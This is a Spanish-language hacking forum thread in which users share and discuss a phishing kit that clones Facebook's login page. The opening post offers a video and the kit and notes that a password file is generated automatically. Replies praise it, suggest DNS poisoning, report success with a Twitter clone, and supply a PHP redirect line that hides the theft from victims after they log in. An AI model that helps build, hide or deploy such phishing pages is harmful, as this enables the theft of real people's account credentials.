Creando un scam - phishing

Iniciado por Federal, Octubre 28, 2012, 01:56:30 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 28, 2012, 01:56:30 AM Ultima modificación: Abril 03, 2013, 12:27:15 PM por Federal
Hola amigos , soy nuevo en este foro y me gustaria compartir un video que hize hace algunos dias . Es sobre como crear un fake de una website (en este caso facebook) :)

Por si el video no cargase les dejo el link : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno aqui les dejo el scam completo:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
el pass.html se genera solo ;)
Saludos .

#!usr/bin/federal
Cuando la vida te presenta razones para llorar, demuéstrale que tienes mil y una razones para vivir y sonreir.

Te felicito por su phising falta un envenamiento a un dns y es un caza bobo para cualquiera. Realice el mismo trabajo pero con twitter y me dio resultado.

Si, buen video, lo que pasa es que una vez tienes el scam subido a un servidor, lo mas dificil es ocultar el link. Alguien tiene alguna manera de ocultarlo bien o que redireccione la pagina  ???

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si, buen video, lo que pasa es que una vez tienes el scam subido a un servidor, lo mas dificil es ocultar el link. Alguien tiene alguna manera de ocultarlo bien o que redireccione la pagina  ???
añadiendo al final del .php el código:
Código: text
header("Location: http://www.webderedireccion.com ");

En dónde You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es l web a la que quieres que te redireccione, te redireccionara cuando le pulses al botón de loguearte ;)
Un Saludo!
The war is the only way (?)

Checando, creo que ya tengo este cod